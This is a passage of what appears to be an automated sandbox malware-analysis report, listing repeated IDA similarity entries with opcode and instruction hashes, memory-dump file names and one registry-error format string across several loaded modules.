                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 8385190164f1da499e7db657225c7121ac9db16c220cfac62d52dec20463a6a4
                  • Instruction ID: e86d19ae0ce051b1523f0b052974854f163b0bc9c0c5c35f4f4283db4b4c248a
                  • Opcode Fuzzy Hash: 8385190164f1da499e7db657225c7121ac9db16c220cfac62d52dec20463a6a4
                  • Instruction Fuzzy Hash: 7AF09662A08706C6F552BF00B880379E258EF417E4FE841BAED5DC6691DF3CDD8A9710
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 98a79bf53b9707b0b89be560322f635c82033732c815f294ff832b0e45eb712a
                  • Instruction ID: 1736b91c9fda1adc6649b108118be2b4224fcfbbe8036aac91372644fb090cdd
                  • Opcode Fuzzy Hash: 98a79bf53b9707b0b89be560322f635c82033732c815f294ff832b0e45eb712a
                  • Instruction Fuzzy Hash: F5F09662A08706C6F552BF00B880379A258FF417E4FE841B9ED5DC6691DF3CDD8A9310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 990066756728bfaa2a4d81c8a44eef0bc49c61021d5e2e0a54b85f4f9143ce46
                  • Instruction ID: d585aa66325d211be435652501a499b2687bbede1bd9f1a0d51ab6c5850f3655
                  • Opcode Fuzzy Hash: 990066756728bfaa2a4d81c8a44eef0bc49c61021d5e2e0a54b85f4f9143ce46
                  • Instruction Fuzzy Hash: F0F09662A0870AC6F552BF00B880379A258EF417E4FE842B9ED5DC6691DF3CDD8A9310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 0e5e66ba41c2d573627e4d7c1ca3e77aab570a109e1527f858700240d134f2da
                  • Instruction ID: 650832368ea00903c70b85a936cda5ec681e1fb0ab3b105feeab0762441e1fc7
                  • Opcode Fuzzy Hash: 0e5e66ba41c2d573627e4d7c1ca3e77aab570a109e1527f858700240d134f2da
                  • Instruction Fuzzy Hash: BEF09662608706C6F552BF00B880379A258FF407E4FE842B9ED5DC6691DF3CDD8A9310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: cdeb8c0778d5ec95aabbdf7d84f7f7528421194025ea21ed43b05ade15f21e50
                  • Instruction ID: eb1ac96e288f2e024fc6fa57b534aa743bb6e4a22bf7e0c3025331d8dbe38b1d
                  • Opcode Fuzzy Hash: cdeb8c0778d5ec95aabbdf7d84f7f7528421194025ea21ed43b05ade15f21e50
                  • Instruction Fuzzy Hash: ECF096A2A08E0642E7529F46BC407B9735DAF447B4F4802BEDD4D466B0EF7DE9899301
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: d89acbca4b734f0ef0a111dd1744566fa57b977269447716bdb86814b99b9422
                  • Instruction ID: c915f54032f6c22d490d241cd0dac2567d151edfaec738859f7c9433c101049a
                  • Opcode Fuzzy Hash: d89acbca4b734f0ef0a111dd1744566fa57b977269447716bdb86814b99b9422
                  • Instruction Fuzzy Hash: 14F096A2A08E0642E7529F46B8407B9735DAF447B4F4802BEDD4D466B0EF7DE9899700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: cd0a951e1bf2ea82e0d4821eb3c00294b76a8aad4edfcec30ea840013d375618
                  • Instruction ID: 5a28aa5eda4fb45d67131a013ecfdc7ca0f4f71f496bacd23eafa70215d38f12
                  • Opcode Fuzzy Hash: cd0a951e1bf2ea82e0d4821eb3c00294b76a8aad4edfcec30ea840013d375618
                  • Instruction Fuzzy Hash: DDF096A2A08F0642E7529F46B8407B9735DAF447B4F4842BEDD4D466B0EF7DD9899300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 84b590a193693856d743421fcd3b4043906201f3b1909d5d21fd49a0aad7dcf4
                  • Instruction ID: b22710df715a9e504f4cf49a658bb59fb4fdb4cc883314ca0f5593862a13d447
                  • Opcode Fuzzy Hash: 84b590a193693856d743421fcd3b4043906201f3b1909d5d21fd49a0aad7dcf4
                  • Instruction Fuzzy Hash: 4BF090A2A08E0682E7529F46BC407B9735DAF447B4F4802BEDD4D466B0EF7DE9899300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: e06eedbcc9ea280e2f8d24d9438890717edad6e02bdf5d05beeeb429cdf2e1f3
                  • Instruction ID: 72c5f16831f6e1d821f8c1501b7a24c728747579ac934b683467533af34264ac
                  • Opcode Fuzzy Hash: e06eedbcc9ea280e2f8d24d9438890717edad6e02bdf5d05beeeb429cdf2e1f3
                  • Instruction Fuzzy Hash: 67F096A2A08F0642E7529F46B8407B9735DAF447B5F4802BEDD4D466B0EF7DE9899300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
                  • Instruction ID: 4d6367f23d750e54cbf7b5c6bdcdb0ffc3a1cb4afdfdd422114128118ddbd8ab
                  • Opcode Fuzzy Hash: 3895ea5ccc1a9c0ba70ec562e9d7737373ffcc11e245141d9ecc3ceb47b072fc
                  • Instruction Fuzzy Hash: 18F09662B0874642E5628F04BC403797354FF44794F480136ED8D466B4DF3DDA85AB01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
                  • Instruction ID: 044903b2d2cece02747f7833f4b3a9fc6c983225c2cdb15cae34df008f4bcfe5
                  • Opcode Fuzzy Hash: 0ae7c48307a6deb01bbf84268c238f770e68e431e8e92444f6d98cededd14a4a
                  • Instruction Fuzzy Hash: 1EF09662B0874642E5628F44B8403797354FF44794F480136ED8D866B4DF3DDA85AB01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
                  • Instruction ID: d59f4d71303ca7646aa86d195382bfca98fa3ad25ee7ada5f5e0739565312152
                  • Opcode Fuzzy Hash: a946e6fb01939640250fe4d87fd1727f894f0189a636eb6478591194451f6b32
                  • Instruction Fuzzy Hash: 75F09662B0874A42E5628F04B8403797354FF44795F480235ED8D466B4EF3DDA85AB01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
                  • Instruction ID: ae9e141f36b9c0831bb92af63c44a5fb23f5088fc813885a4ceccdc45f64d937
                  • Opcode Fuzzy Hash: cb64d1539feb0c34fc73d2a78e2a49e7fe7a9be699fe1023e1cdf2c904b94b15
                  • Instruction Fuzzy Hash: 58F09662B0874642E5728F04BC403797354FF44794F480135ED8D466B4DF3DDA89AB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
                  • Instruction ID: 06a69a677d2a1ee8c3e1a6ba24ff54d960bcd23942e6877465c3697182eeed66
                  • Opcode Fuzzy Hash: cda576ce803dd63f734d1a0fb6bc0958773d9d3f96f8f8fa6c15edd8b57912cf
                  • Instruction Fuzzy Hash: 20F09662B0874642E6628F04B8403797354FF44794F484235EDCD466B4DF3DDA89AB01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
                  • Instruction ID: 86ce30af62eefcd1e362b89dd4a3caa6e9a74b2ee184367626b2dbb0807cdfa8
                  • Opcode Fuzzy Hash: 1726078345292218ae6fca3387da9e0b278bbc608f39be5f3a5ef1151e4d23a0
                  • Instruction Fuzzy Hash: 6EF06DA2A0C75B82E5529F10F8447BA6254AF447A8F48023BDD9D866B2EF2CD9899300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
                  • Instruction ID: 1a299213a822cc5f253556a3a435b4da673161fc3fbd51081930cf426b5c8ecc
                  • Opcode Fuzzy Hash: b037b6fe6f67dfd604fa9fd6ca3b6c35f87ca430a8ddf23a29a78834e700ff42
                  • Instruction Fuzzy Hash: 34F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
                  • Instruction ID: 2f7950778ae422de24e56455a1765d966b00fb18ad4645a8d2ceac97e60131d9
                  • Opcode Fuzzy Hash: d6ff838a34e7d2476074e47ccabdb3b9f61c6b2b69fb8e677531412b271319d3
                  • Instruction Fuzzy Hash: 56F090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
                  • Instruction ID: 0e92d6aa44722bc36fcf251fd76824ec65a13b4387d5e34c320950e713e27049
                  • Opcode Fuzzy Hash: 7f4bb2757c6429af5118dbfa1ec4bb69a9b171593b6e8716668abd9c92b91476
                  • Instruction Fuzzy Hash: 1BF090A2A0C75B82E5529F10F8447BA6254FF447E8F48023BDDDD876B1EF2CD9899700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
                  • Instruction ID: dd454f8397a2f4b4e64eb1f64dba90335dafc04b0a8137ec97555e6c13e4577c
                  • Opcode Fuzzy Hash: bda0a4a6d43b740aecd7a68f54ee1cef6273edae9aa568f0334e52d24c909ae7
                  • Instruction Fuzzy Hash: 30F090A2A0C75B82E6529F10F8447BA6254FF447E8F084237DDDD876B1EF2CD9899300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 90650f36d771836d13a11600e8b2b318ae25d023a5e1960832098a05e009ab10
                  • Instruction ID: 3808918733f5d3219b37a972a01e3e456a750084781d296ec3787d9b3c8224d3
                  • Opcode Fuzzy Hash: 90650f36d771836d13a11600e8b2b318ae25d023a5e1960832098a05e009ab10
                  • Instruction Fuzzy Hash: 06F09C52608B4652EB518F41FC443BB625CBF447B4FC802B5DD4D466E0FF2DE9859304
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
